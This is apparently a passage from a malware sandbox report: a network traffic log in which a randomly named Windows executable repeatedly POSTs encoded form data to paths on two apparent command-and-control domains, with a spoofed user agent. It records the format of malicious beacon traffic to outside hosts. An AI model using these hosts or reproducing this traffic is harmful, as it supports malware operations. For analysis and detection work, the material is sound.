                                                                  Oct 21, 2024 11:29:57.280606985 CEST325INHTTP/1.1 404 Not Found
                                                                  server: openresty
                                                                  date: Mon, 21 Oct 2024 09:29:57 GMT
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  x-powered-by: PHP/7.2.30
                                                                  content-encoding: gzip
                                                                  connection: close
                                                                  Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.2249166185.196.10.234801596C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 21, 2024 11:29:58.767724037 CEST675OUTPOST /quvp/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US
                                                                  Accept-Encoding: gzip, deflate
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 202
                                                                  Host: www.75e296qdx.top
                                                                  Origin: http://www.75e296qdx.top
                                                                  Referer: http://www.75e296qdx.top/quvp/
                                                                  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                  Data Raw: 49 44 58 34 36 3d 55 55 64 41 39 57 75 66 65 6e 46 41 52 58 58 6d 36 56 49 4a 69 2f 77 39 67 4f 30 30 45 50 7a 4d 6f 38 69 58 71 6b 33 4e 74 2f 43 43 64 57 4f 50 38 76 61 54 33 7a 43 38 38 6b 57 6f 4d 64 64 66 2f 4f 6b 33 4d 6c 50 37 61 4e 58 76 4d 77 77 4a 6a 79 49 67 70 56 72 6b 52 52 4d 6d 55 35 65 56 37 33 44 37 62 57 5a 50 66 42 63 30 33 61 50 50 2f 74 59 52 65 52 70 56 4e 56 69 73 68 59 53 6c 42 77 74 4d 34 43 69 61 6f 66 72 75 57 70 49 66 53 35 38 70 44 6b 68 52 45 39 67 41 79 76 59 64 65 66 6d 74 37 33 4f 62 37 68 6f 58 45 70 39 6a 75 6c 6c 73 57 61 76 55 73 76 49 75 59 2f 32 46 43 51 3d 3d
                                                                  Data Ascii: IDX46=UUdA9WufenFARXXm6VIJi/w9gO00EPzMo8iXqk3Nt/CCdWOP8vaT3zC88kWoMddf/Ok3MlP7aNXvMwwJjyIgpVrkRRMmU5eV73D7bWZPfBc03aPP/tYReRpVNVishYSlBwtM4CiaofruWpIfS58pDkhRE9gAyvYdefmt73Ob7hoXEp9jullsWavUsvIuY/2FCQ==
                                                                  Oct 21, 2024 11:29:59.715586901 CEST325INHTTP/1.1 404 Not Found
                                                                  server: openresty
                                                                  date: Mon, 21 Oct 2024 09:29:59 GMT
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  x-powered-by: PHP/7.2.30
                                                                  content-encoding: gzip
                                                                  connection: close
                                                                  Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.2249167185.196.10.234801596C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 21, 2024 11:30:01.310566902 CEST2472OUTPOST /quvp/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US
                                                                  Accept-Encoding: gzip, deflate
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 3626
                                                                  Host: www.75e296qdx.top
                                                                  Origin: http://www.75e296qdx.top
                                                                  Referer: http://www.75e296qdx.top/quvp/
                                                                  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                  Data Raw: 49 44 58 34 36 3d 55 55 64 41 39 57 75 66 65 6e 46 41 51 30 66 6d 34 79 55 4a 6c 66 77 2b 76 75 30 30 64 66 7a 32 6f 38 6d 58 71 68 50 6e 73 4e 75 43 64 42 71 50 38 4e 43 54 36 54 43 38 72 55 57 30 47 39 63 65 2f 4f 78 49 4d 6d 62 4e 61 4a 7a 76 4e 54 34 4a 68 77 51 6e 78 31 72 69 48 68 4d 6e 55 35 65 41 37 33 54 2f 62 57 4d 61 66 46 49 30 32 6f 6e 50 7a 4e 59 53 41 42 70 56 4e 56 69 67 68 59 54 47 42 77 6c 69 34 47 71 4b 6f 70 48 75 57 49 6f 66 52 61 55 71 4c 45 68 56 66 64 68 4c 79 73 35 56 5a 75 36 58 78 30 53 31 30 54 38 31 49 62 64 42 6a 6d 42 7a 53 4b 54 32 71 36 6f 78 53 75 62 64 65 50 4c 6b 4f 4b 6f 39 59 74 49 30 33 4a 58 4a 67 68 42 68 2f 6b 4a 64 76 51 37 6c 78 33 4b 53 73 75 6b 54 38 48 57 66 6d 61 64 4e 78 52 75 51 68 59 41 78 4c 56 6f 48 33 78 59 36 6f 46 4c 76 6d 37 57 62 76 6c 6b 55 49 32 57 44 4c 5a 53 4d 76 6e 30 4f 51 67 41 2f 59 7a 4b 65 56 44 78 79 64 39 48 33 51 75 48 41 63 35 33 41 79 75 34 57 63 37 39 77 68 4b 63 6f 57 62 30 38 41 69 71 6c 75 55 6e 2f 72 38 61 6b 61 6e 43 45 [TRUNCATED]
                                                                  Data Ascii: IDX46=UUdA9WufenFAQ0fm4yUJlfw+vu00dfz2o8mXqhPnsNuCdBqP8NCT6TC8rUW0G9ce/OxIMmbNaJzvNT4JhwQnx1riHhMnU5eA73T/bWMafFI02onPzNYSABpVNVighYTGBwli4GqKopHuWIofRaUqLEhVfdhLys5VZu6Xx0S10T81IbdBjmBzSKT2q6oxSubdePLkOKo9YtI03JXJghBh/kJdvQ7lx3KSsukT8HWfmadNxRuQhYAxLVoH3xY6oFLvm7WbvlkUI2WDLZSMvn0OQgA/YzKeVDxyd9H3QuHAc53Ayu4Wc79whKcoWb08AiqluUn/r8akanCEOnEtypbB/qc3KgY8Q2cwFQwhm/++3l0MQdsyg1jRYOqPA4dEXFFppGaf6eBGCjkJyZhrfOR2TwDpzxDUlEyFHlc4BRS6qFf2nOcvapcYwU4B9jrGIjxwy1dd3gdw68Bnxlm5D3i94yqMfZOEhNKBdq6jeunSgTIIqGQDNx5sXKj/zM8yVBNUyUJ5v6I0+BTLnG3HctNXE5SJ+EogDST2Ylwrx7QrHxV11dC8mMB0ccb/mG2R9lkC5StK+3oRLFEyds3FUYb8KyGp2zu6QSNG3DkZZCvXmkg2mnqBolsNxtVWIQRLO1CDb2PK+0FOIXN7QYeivdLocsaPdSJMIQaWMHbUTUGTbphG8vDdN+LS18WZk/Vu5pGYYiWU66f+OEGU12W+Wsr6Vp8VuT7gp+XLnkEsuGWI2YvMRTpoBrz89dVQBCN9OW/Oha4rVJ+phT7tqDOcsJpHY9FNQ51ZsDjElrUFPnwHEg5HdFvovKu2TXNU+wll6KAst4E1zJFQNVVQ4bGjlJcnHtCVMnIlUSgr67d1cC3GbJaPL3MEStpnCFMF118+5HyAbIOc1h8QyvftQMUG5G91Ehu/uFuU52QUOjegFxCICjEqyNGiqGYsZAZf+FfA47kboQLfKIRwxZeXvHO/l0UaPaYAb74NjPYAnlZoxcw6+x7/a3 [TRUNCATED]
                                                                  Oct 21, 2024 11:30:01.316056013 CEST1628OUTData Raw: 46 76 35 71 46 66 45 53 42 46 71 59 50 78 34 37 32 78 48 7a 70 61 56 32 6c 4c 46 5a 46 2b 6a 51 67 58 47 54 41 41 2f 30 4e 58 69 75 44 58 75 63 2f 4a 62 43 6a 7a 50 7a 39 46 57 78 36 4f 6e 75 48 59 69 52 5a 57 74 4e 73 49 64 47 45 7a 4d 44 59 30
                                                                  Data Ascii: Fv5qFfESBFqYPx472xHzpaV2lLFZF+jQgXGTAA/0NXiuDXuc/JbCjzPz9FWx6OnuHYiRZWtNsIdGEzMDY0tiVFwnxY6gnJhgC70WJUqO2pF5hE13mYLwAyhP/oKtnuYseFzAnhUbTbBrV2UwAtQqMa5VWRxjermivi3SUu+Uj3o1J9MDH9ty28qqqpG3o4bOiVPHiHNZm9LMT2AJPuCEMiavDkiCIsxl9RqISz2ksqT61t6hkLX
                                                                  Oct 21, 2024 11:30:02.375142097 CEST325INHTTP/1.1 404 Not Found
                                                                  server: openresty
                                                                  date: Mon, 21 Oct 2024 09:30:02 GMT
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  x-powered-by: PHP/7.2.30
                                                                  content-encoding: gzip
                                                                  connection: close
                                                                  Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.2249168185.196.10.234801596C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 21, 2024 11:30:03.853760004 CEST414OUTGET /quvp/?IDX46=ZW1g+h73VjV8NmrD3A0IsvQAl9tCTvv5s7OxxnbN69qnRFmJveufixywo3eCJN9Bi9pNL2fgeIfBDTgJwEUErU/4IwV0Yt2V4k+CbVZpThcE8pzI6qgsTHE3GSfU&eDZh=0pI0vDB HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US
                                                                  Connection: close
                                                                  Host: www.75e296qdx.top
                                                                  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                  Oct 21, 2024 11:30:04.818850040 CEST323INHTTP/1.1 404 Not Found
                                                                  server: openresty
                                                                  date: Mon, 21 Oct 2024 09:30:04 GMT
                                                                  content-type: text/html
                                                                  content-length: 150
                                                                  x-powered-by: PHP/7.2.30
                                                                  connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.224916915.197.148.33801596C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 21, 2024 11:30:10.008263111 CEST2472OUTPOST /2xrt/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US
                                                                  Accept-Encoding: gzip, deflate
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 2162
                                                                  Host: www.myprefpal.xyz
                                                                  Origin: http://www.myprefpal.xyz
                                                                  Referer: http://www.myprefpal.xyz/2xrt/
                                                                  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                  Data Raw: 49 44 58 34 36 3d 67 2b 34 46 76 37 75 37 79 58 69 4b 6f 39 4c 41 67 6c 36 6d 6b 35 54 52 4e 6c 47 50 65 50 70 4b 37 6d 58 37 59 4f 52 77 71 2b 73 51 6f 49 46 52 77 76 33 45 70 2b 54 48 7a 6a 71 54 58 56 79 4e 66 33 4c 41 39 67 6c 79 4e 2f 5a 48 4e 35 34 65 65 72 4c 58 47 71 65 45 4e 2b 53 71 73 54 76 4a 61 48 34 32 72 67 39 63 4e 2f 39 6a 75 75 41 41 58 46 2b 6e 70 4a 61 67 6b 4b 43 34 45 4b 76 54 2f 59 36 6b 44 2b 44 46 4e 61 53 6e 42 59 41 69 73 62 6a 47 53 2b 45 36 72 49 73 55 30 6d 64 74 51 51 30 6e 5a 52 6e 7a 78 75 53 32 45 2b 61 7a 67 67 75 30 74 66 66 54 49 55 41 5a 57 6a 36 54 39 4e 48 50 65 64 30 78 73 31 36 59 37 4c 69 6c 65 4d 72 72 4c 6c 68 4b 57 64 52 74 42 75 52 6a 7a 30 31 6b 51 75 39 49 56 65 4b 45 64 5a 57 4e 45 77 70 38 59 67 69 38 32 50 6a 69 6a 51 56 45 6e 4a 51 53 57 63 65 73 49 36 72 4a 6c 75 5a 4f 67 67 50 6b 48 31 56 5a 71 36 59 63 58 4f 49 54 7a 4e 4e 75 74 31 54 39 47 4e 42 76 38 36 35 44 61 4d 42 57 63 6b 55 6d 7a 6f 4e 62 61 62 35 51 72 49 4a 58 4e 51 42 75 76 4d 47 5a [TRUNCATED]
                                                                  Data Ascii: IDX46=g+4Fv7u7yXiKo9LAgl6mk5TRNlGPePpK7mX7YORwq+sQoIFRwv3Ep+THzjqTXVyNf3LA9glyN/ZHN54eerLXGqeEN+SqsTvJaH42rg9cN/9juuAAXF+npJagkKC4EKvT/Y6kD+DFNaSnBYAisbjGS+E6rIsU0mdtQQ0nZRnzxuS2E+azggu0tffTIUAZWj6T9NHPed0xs16Y7LileMrrLlhKWdRtBuRjz01kQu9IVeKEdZWNEwp8Ygi82PjijQVEnJQSWcesI6rJluZOggPkH1VZq6YcXOITzNNut1T9GNBv865DaMBWckUmzoNbab5QrIJXNQBuvMGZLePJ6olszeLugJN667KK2lQtDPRgwLqB1UzInHEhq153Q5dkzqj1AW++w2QtebqhJSh5RJLH2SQK3PC8bQ07D1biF1hm9bfZ+PcJGQh/blz5/mIwjJ0nAvKIetV7Gph+n49wb+sZhgILDsR5ijWUtYe6ltauVzjNzRqRXJ8LCmLOBx9DLTaSRL6UwzdAxHOdZP+/qWqvfuGBmJSsY9kdfdqjVk3o9zJEIBie6KxSySVCKAliPiL95WByhC6hk5dBvvz65Pe53lC23yvhgC5iK8iDuV55UUqcAGEE3oW5LrERBxHUQNrZnO0sLD770GdoO0+WB+Sm4SlNiADjtToIukF1ir9Aic5+45uw0AYo/gMKqzK9rOwpjHqkzY888Y55kqk92ZCuu55KBCGk2ncMvtS87qOL4cjvNEXvzFinYxUxf/DKR3DC6W23/N3nr33HAaVP0Kj55FWsaEtF/t/KcUZVxwoDcU//3FhCdEqVZLNsiJnL1+Ed9oYJ73O9KXRUIvAoMAbSh7IjlnSyp8Y4sLEEmU2Hvq4k7WJhhfUk6Jq0py3jEaihrOWktJp6zzHJEJGGZmcDryjsKFDihGa9W471iOGYxvcUjNN0LN/BlDmCgvRKaa0ty1DnFZoa+eGL/GjWyHxH92QQuNT2kFwJcH6etz9S2DOmHV [TRUNCATED]
                                                                  Oct 21, 2024 11:30:10.013587952 CEST164OUTData Raw: 72 33 72 79 6a 4d 73 2f 54 55 49 48 7a 4a 37 39 48 77 72 6d 54 6f 69 70 79 30 70 57 72 62 45 61 64 6a 4c 72 79 43 46 77 65 37 44 38 59 41 31 4c 4c 48 2b 65 79 76 51 2f 4b 33 61 2b 76 76 43 2b 6e 52 4c 38 63 56 79 79 6c 67 70 64 76 72 7a 50 46 74
                                                                  Data Ascii: r3ryjMs/TUIHzJ79HwrmToipy0pWrbEadjLryCFwe7D8YA1LLH+eyvQ/K3a+vvC+nRL8cVyylgpdvrzPFtZ/aSEE0lvmzh89opi/qK0b5mP7vE2JB9XzUTpE0URVOMv7ZMyIClzeuD/YR1xTbN+fPWveWccAL/h50ChM


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.224917015.197.148.33801596C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 21, 2024 11:30:12.847484112 CEST675OUTPOST /2xrt/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US
                                                                  Accept-Encoding: gzip, deflate
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 202
                                                                  Host: www.myprefpal.xyz
                                                                  Origin: http://www.myprefpal.xyz
                                                                  Referer: http://www.myprefpal.xyz/2xrt/
                                                                  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                  Data Raw: 49 44 58 34 36 3d 67 2b 34 46 76 37 75 37 79 58 69 4b 6f 36 6e 41 68 30 36 6d 72 35 54 52 4f 6c 47 50 58 76 70 49 37 6d 4b 52 59 50 6c 67 71 4a 49 51 6f 64 35 52 77 39 76 45 6f 2b 54 41 37 44 71 58 4b 6c 7a 51 66 33 4c 71 39 6c 64 79 4e 2b 39 48 4e 63 30 65 63 71 4c 51 4a 36 65 4b 41 65 53 52 73 54 6a 54 61 48 39 39 72 67 56 63 4e 39 5a 6a 76 71 63 41 63 42 65 6e 37 4a 61 6d 6f 61 43 56 45 4b 72 4b 2f 59 4b 37 44 39 6e 46 4e 50 4b 6e 43 4e 30 69 70 4d 66 47 45 4f 45 37 78 34 74 37 6c 45 49 6e 49 51 67 35 55 6e 2b 49 32 2f 75 37 49 74 36 6c 70 32 53 75 6b 4d 4c 37 4f 79 78 79 63 68 76 4a 72 67 3d 3d
                                                                  Data Ascii: IDX46=g+4Fv7u7yXiKo6nAh06mr5TROlGPXvpI7mKRYPlgqJIQod5Rw9vEo+TA7DqXKlzQf3Lq9ldyN+9HNc0ecqLQJ6eKAeSRsTjTaH99rgVcN9ZjvqcAcBen7JamoaCVEKrK/YK7D9nFNPKnCN0ipMfGEOE7x4t7lEInIQg5Un+I2/u7It6lp2SukML7OyxychvJrg==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.224917115.197.148.33801596C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 21, 2024 11:30:15.410162926 CEST2472OUTPOST /2xrt/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US
                                                                  Accept-Encoding: gzip, deflate
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 3626
                                                                  Host: www.myprefpal.xyz
                                                                  Origin: http://www.myprefpal.xyz
                                                                  Referer: http://www.myprefpal.xyz/2xrt/
                                                                  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                  Data Raw: 49 44 58 34 36 3d 67 2b 34 46 76 37 75 37 79 58 69 4b 6f 61 33 41 6d 54 75 6d 6a 35 54 4f 42 46 47 50 65 50 70 4d 37 6d 57 52 59 4f 52 77 71 37 45 51 6f 4b 64 52 31 76 33 45 71 2b 54 41 39 44 71 54 58 56 79 53 66 30 33 75 39 67 68 69 4e 38 78 48 4e 39 6b 65 65 6f 6a 58 42 71 65 45 45 65 53 53 73 54 6a 6a 61 44 5a 78 72 67 41 78 4e 39 52 6a 76 63 49 41 55 52 65 67 6e 5a 61 6d 6f 61 43 5a 45 4b 71 70 2f 59 44 38 44 2f 58 56 4e 64 69 6e 43 6f 41 69 71 72 6a 46 51 2b 45 2f 76 49 73 61 30 6d 42 63 51 51 30 6a 5a 56 4f 37 78 75 4f 32 46 74 53 7a 67 6e 36 33 77 66 66 4d 47 30 41 5a 4a 54 36 64 39 4e 47 57 65 64 30 78 73 77 6d 59 36 62 69 6c 65 4f 54 30 50 6c 68 4b 59 39 52 61 50 4f 55 53 7a 30 68 5a 51 75 73 31 4a 35 53 45 65 63 43 4e 4f 51 70 38 51 77 69 2b 32 50 6a 76 70 77 55 76 6e 4a 49 61 57 59 44 72 49 36 72 4a 6c 73 52 4f 6b 79 6e 6b 52 56 56 5a 68 61 59 64 65 75 49 53 7a 4e 4a 59 74 30 58 39 47 4d 70 76 39 4e 56 44 4e 65 70 58 58 30 55 6c 69 34 4e 6a 4c 72 34 55 72 49 56 35 4e 51 59 4c 76 50 4f 5a [TRUNCATED]
                                                                  Data Ascii: IDX46=g+4Fv7u7yXiKoa3AmTumj5TOBFGPePpM7mWRYORwq7EQoKdR1v3Eq+TA9DqTXVySf03u9ghiN8xHN9keeojXBqeEEeSSsTjjaDZxrgAxN9RjvcIAURegnZamoaCZEKqp/YD8D/XVNdinCoAiqrjFQ+E/vIsa0mBcQQ0jZVO7xuO2FtSzgn63wffMG0AZJT6d9NGWed0xswmY6bileOT0PlhKY9RaPOUSz0hZQus1J5SEecCNOQp8Qwi+2PjvpwUvnJIaWYDrI6rJlsROkynkRVVZhaYdeuISzNJYt0X9GMpv9NVDNepXX0Uli4NjLr4UrIV5NQYLvPOZLc3JhJlswuLhppN+wbGO2mwHDPUXwJuB0AnIkBQmll5xV5cK4Kj5AVSUw2wtev+hIRp5be3ImiQNzPCrOA0VD1fEFwEj8qvZ4vcJWjZwEFy96mJltp0xAvK2epUMGZZ+n4NwcrwZhgIKGsR3rDS2tZi+lp7jVw7NyAaRXI8LImLOLR96FzaiRLuuwy1+x0ydauu/n0yvOeGDkJSpc9kqfZOjVhGv9zRELgie7rxS+yVGUwltPiLb5WV2hCqfk65Bvuz6oee57FCzxyvlxS5BK87euVFDUQ+cGWkE1d65KLETDxHUZtqEnOtXLHjr0D5oOFuWHeSl1ylClwDgnzpPukV1irxAicR+7KWwwxYoigME3jLghuMNjH6ozdcs8eh5ioc9hs2trJ5MTSGu8HcgvtS47uab4NDvNQXvg26oXxUyEvDdfXDi6WnS/IH3rEDHAblP0ZL55VWsaEta/t/OcUVGx1MpcU//lEhCeyeVNbNprpnqx+ET9oMv72mHKW9UI+goMAbRrrIgsHSxp8kPsLEqmUKHsY0k5AFhvcsk8pq0+C3gP6igrOWOtMBqzyHJeZmGMl4AiijpDlCgomW+W42oiPSY2Y8UlcN0L9/B5zmBvPQQebILy13dFcMz/raL+xHWwAlE1mQTgtTwkF1/cHyoty0v2CGmH1 [TRUNCATED]
                                                                  Oct 21, 2024 11:30:15.415138006 CEST1628OUTData Raw: 72 6e 4c 79 6a 2b 55 2f 59 79 63 48 35 4a 37 38 4a 51 72 52 54 6f 75 42 79 30 34 48 72 61 55 67 63 52 6a 72 7a 79 46 77 61 2b 33 2f 63 41 30 41 4d 48 2b 70 79 76 51 54 4b 33 69 36 76 76 75 75 6e 54 72 38 63 58 71 79 6b 51 70 61 72 62 7a 4e 4a 4e
                                                                  Data Ascii: rnLyj+U/YycH5J78JQrRTouBy04HraUgcRjrzyFwa+3/cA0AMH+pyvQTK3i6vvuunTr8cXqykQparbzNJNZ5aS5Q0lnIzhs9oo+/rqkbuWP7w022IdXqZzlD0U4TQYjBOIetGWjX3jzHBnF8GOyqWUHues0vV7k2lFNMjAHWw4GmkweaHihzP0CCgPAx393d4wKd8YfM6eTA1pKRfOyTXnGttQCE18b5fVo1gcAqWjdJnHB27wz


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.224917215.197.148.33801596C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 21, 2024 11:30:17.953142881 CEST414OUTGET /2xrt/?IDX46=t8QlsLf/hSao5OfTjGXyvO3SE3egRcZN/0WYGutq4Zw3gZ9pwtfqpd7Txie7AUKWMV3AhFtCGrZ0PcR2NtL0Erm7E7qQmCH1czZzhi0sD+dlnO4gaz+HrJe+v97h&eDZh=0pI0vDB HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US
                                                                  Connection: close
                                                                  Host: www.myprefpal.xyz
                                                                  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                  Oct 21, 2024 11:30:25.651590109 CEST398INHTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Mon, 21 Oct 2024 09:30:25 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 258
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 44 58 34 36 3d 74 38 51 6c 73 4c 66 2f 68 53 61 6f 35 4f 66 54 6a 47 58 79 76 4f 33 53 45 33 65 67 52 63 5a 4e 2f 30 57 59 47 75 74 71 34 5a 77 33 67 5a 39 70 77 74 66 71 70 64 37 54 78 69 65 37 41 55 4b 57 4d 56 33 41 68 46 74 43 47 72 5a 30 50 63 52 32 4e 74 4c 30 45 72 6d 37 45 37 71 51 6d 43 48 31 63 7a 5a 7a 68 69 30 73 44 2b 64 6c 6e 4f 34 67 61 7a 2b 48 72 4a 65 2b 76 39 37 68 26 65 44 5a 68 3d 30 70 49 30 76 44 42 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IDX46=t8QlsLf/hSao5OfTjGXyvO3SE3egRcZN/0WYGutq4Zw3gZ9pwtfqpd7Txie7AUKWMV3AhFtCGrZ0PcR2NtL0Erm7E7qQmCH1czZzhi0sD+dlnO4gaz+HrJe+v97h&eDZh=0pI0vDB"}</script></head></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.224917315.197.148.33801596C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 21, 2024 11:30:30.698054075 CEST2472OUTPOST /to3j/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US
                                                                  Accept-Encoding: gzip, deflate
                                                                  Content-Type: application/x-www-form-urlencoded
